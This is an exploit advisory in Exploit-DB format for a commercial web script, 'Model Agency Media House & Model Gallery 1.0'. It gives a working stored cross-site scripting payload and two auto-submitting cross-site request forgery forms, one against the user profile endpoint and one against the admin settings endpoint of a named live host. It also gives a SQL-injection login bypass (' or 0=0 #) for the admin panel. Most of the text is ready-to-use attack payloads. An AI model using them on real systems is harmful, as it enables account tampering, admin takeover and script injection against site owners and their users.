# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass # Date: 2018-05-21 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29 # Version: 1.0 # Tested on: Kali linux # Description: #Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities : # POC 1 : Persistent cross site scripting : 1) After creating an account , go to your profile. 2) Navigate to "Update profile" and put this payload : "/><script>alert(document.domain)</script> 3) You will have an alert box in the page . # POC 2 : CSRF : cross site request forgery : # User's CSRF exploit : <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://model.thesoftking.com/updateprofile" method="post"> <input type="hidden" name="name" value="anything"> <input type="hidden" name="mobile" value="200000"> <input type="hidden" name="address" value="anything"> </form> <script> document.forms[0].submit(); </script> </body> </html> # Admin page CSRF exploit : <form action="http://model.thesoftking.com/admin/setgeneral.php" method="post"> <input name="name" value="test" type="hidden"> <input name="wcmsg" value="test" type="hidden"> <input name="address" value="test2" type="hidden"> <input name="mobile" value="1000000" type="hidden"> <input name="email" value="test@test.com" type="hidden"> <input name="currency" value="decode" type="hidden"> </form> <script> document.forms[0].submit(); </script> # POC 3 : Authentication bypass : # Attacker can bypass admin panel without any authentication : Path : /admin Username : ' or 0=0 # Password : anything